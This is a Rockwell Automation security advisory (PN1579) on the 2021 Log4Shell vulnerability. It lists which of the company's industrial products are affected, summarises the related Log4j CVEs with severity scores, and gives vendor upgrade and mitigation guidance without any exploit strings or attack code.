PN1579 | Log4Shell Vulnerability Notice

Executive Summary

On December 9, 2021, a vulnerability was announced named “Log4Shell” by researchers. This vulnerability allows for remote code execution by exploiting the Java Logging Library log4j2.

Rockwell Automation is aware of this vulnerability and of how it could, if exploited, potentially impact our customers’ environments. Rockwell Automation has completed process of evaluation on how the mitigation techniques will impact the functionality and performance of the Rockwell Automation hardware, software, and pre-engineered products and solutions that incorporate this software.

Affected Products

Rockwell Automation has investigated its product portfolio to identify which of its products may be directly affected by the "Log4Shell" vulnerability. Rockwell Automation will continue to monitor this situation and will update this advisory if necessary. Our investigation has indicated that the following Rockwell Automation products are affected.

Product Affected	Versions Affected
Plex (A Rockwell Automation Company) Industrial Internet of Things	All Versions < 2.17
Fiix (A Rockwell Automation Company) CMMS™ core V5	This product is cloud-based and has been updated for all customers.
Warehouse Management	4.01.00, 4.02.00, 4.02.01, 4.02.02
EIG (Discontinued)	3.03.00
Industrial Data Center	9300-NS-ESSENTIAL, 9300-NS-ESSENTIALPLUS – Gen 1, Gen 2, Gen 3, Gen 3.5
VersaVirtual™ Application	9300-VV2000RN, 9300-VV2000EN, 9300-VV1000RN, 9300-VV1000EN – Series A
FactoryTalk® Analytics™ DataFlowML	All Versions until 4.00.00 (including)
FactoryTalk Analytics DataView	All
Firewall Managed Support – Cisco FirePOWER® Thread Defense	9300-FMAN, 9300-FSYS Version 6.2.3 – 7.1.0

Vulnerability Details

CVE-2021-44228: Apache Log4j2 JNDI features do not help protect against attacker-controlled LDAP and other JNDI related endpoints

Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

CVSS v3.1 Base Score: 10/10 [Critical]
CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack.

It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack. Log4j 2.15.0 restricts JNDI LDAP lookups to localhost by default. Note that previous mitigations involving configuration such as to set the system property log4j2.noFormatMsgLookup to true do NOT mitigate this specific vulnerability.

CVSS v3.1 Base Score: 3.7/10 [Moderate]
CVSS V3.1 Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

CVE-2021-4104: JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data

JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.

CVSS v3.1 Base Score: 8.1/10 [High]
CVSS V3.1 Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2019-17571: Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data

Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data which can be exploited to remotely execute arbitrary code when combined with a deserialization gadget when listening to untrusted network traffic for log data. This affects Log4j versions up to 1.2 up to 1.2.17.

CVSS v3.1 Base Score: 9.8/10 Critical]
CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Risk Mitigation & User Action

Vulnerability	Products Affected	Suggested Actions
CVE-2021-44228	Plex Industrial IoT	This product has been updated to version 2.17.1 and all vulnerabilities are mitigated at this time.  No user action is required.
	Fiix CMMS core V5	The product has been updated to remove Log4j completely and is no longer vulnerable. No user interaction is required.
	Warehouse Management Version 4.01.00, 4.02.00, 4.02.01, 4.02.02	Customers should upgrade to version 4.02.03, which has been released to mitigate this vulnerability.
	MES EIG 3.03.00	This product is currently discontinued and therefore no patch will be provided. Customers should upgrade to EIG Hub if possible or work with their local representatives about alternative solutions.
	Industrial Data Center (9300-NS-ESSENTIAL, 9300-NS-ESSENTIALPLUS) – Gen 1, Gen 2, Gen 3, Gen 3.5	- For non-managed support customers, follow the mitigation instructions outlined by VMware in VMSA-2021-0028. - For managed support customers, Rockwell Automation support team will be reaching out to affected customers to implement mitigation steps. For specific site details, please contact the support team or your Customer Success Manager. - For non-managed support customers with a with VNxE, follow the mitigation outlined by Dell in DSA-2021-298. - For non-managed support customers with a Data Domain, follow the mitigation outlined by Dell in DSA-2021-274
	VersaVirtual (9300-VV2000RN, 9300-VV2000EN, 9300-VV1000RN, 9300-VV1000EN) – Series A	- For non-managed support customers, follow the mitigation instructions outlined by VMware in VMSA-2021-0028.2. - For managed support customers, Rockwell Automation support team will be reaching out to affected customers to implement mitigation steps. For specific site details, please contact the support team or your Customer Success Manager.
	FactoryTalk Analytics DataFlowML	Customers should upgrade to version 4.00.01, which has been released to mitigate this vulnerability. It is recommended that customers not use DataFlow ML prior to version 4.00.01.
	FactoryTalk Analytics DataView 3.02	Customers are required to upgrade from 3.02 to 3.03.01.  Customers who have prior versions are required to upgrade to 3.02 first. It is recommended that customers not use DataFlow ML prior to version 4.00.00.
	Firewall Managed Support – Cisco Firepower Thread Defense (9300-FMAN, 9300-FSYS) Version 6.2.3 – 7.1.0	- For managed support customers, Rockwell Automation support team will be reaching out to affected customers to implement mitigation steps. For specific site details, please contact the support team or your Customer Success Manager. - For non-managed support customers, follow the mitigation instructions outlined by Cisco in CSCwa46963.
CVE-2021-45046, CVE-2021-4104, CVE-2019-17571	No products affected at this time.

Products Using Log4j 1.2
A number of Rockwell Automation products contain log4j libraries that may be detected by various scanning tools. These products do not use the JMSAppender nor the Socket Server and are not vulnerable to CVE-2021-4104 and CVE-2019-17571:

Products Evaluated and Not Affected	Suggested Actions
Factory Talk Analytics Data View 3.02.00, 3.03.00, 4.00.00, 4.01.00	No actions are needed as these products do not use the JMSAppender nor the Socket Server and therefore are not vulnerable.
Data Scheduler
FactoryTalk Augmented Modeler
Factory Talk Analytics Data Flow ML 2.01
Factory Talk Analytics Information Platform
Live Transfer 10.4, 11.0
Pavilion8
Factory Talk Analytics Security Provider 3.02.00, 3.03.00
PanelView 5000
FactoryTalk Production Centre (All Versions)
Factory Talk Pharma Suite (All Versions)
Studio 5000 View Designer	Studio 5000 does not use the JMSAppender nor the Socket Server and is not vulnerable.   Note: Studio 5000 consists of Studio 5000 Logix Designer and Studio 5000 View Designer.  If Logix Designer is the only component required, then View Designer version 8 or older may be removed by uninstalling it using the Windows Add/Remove Programs feature.  Uninstall “Studio 5000 View Designer”.  This will remove the log4j 1.2x library completely.  Alternatively, update Studio 5000 View Designer to version 9 or later which has updated log4j libraries that are not vulnerable.

General Security Guidelines

See the Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Industrial Security Services website for information on security services from Rockwell Automation to assess, protect, detect, respond and recover from incidents. These services include assessments, designs, implementations, industrial anomaly detection, patch management, and remote infrastructure monitoring and administration.

We also recommend concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located in PN1354 – Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website .

If you have questions regarding this notice, please send an email to our product security inbox at: secure@ra.rockwell.com.

General Mitigations

• Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
• Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
• Locate control system networks and devices behind firewalls and isolate them from the business network.
• Visit links below for more mitigation techniques

ADDITIONAL LINKS

• NVD - CVE-2021-44228 (nist.gov)

• NVD - CVE-2021-45046 (nist.gov)

• NVD - CVE-2021-4104 (nist.gov)

• NVD - CVE-2019-17571 (nist.gov)

• Apache Log4j Vulnerability Guidance | CISA

• Log4j – Apache Log4j Security Vulnerabilities

• PN1354 - Industrial Security Advisory Index

• Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide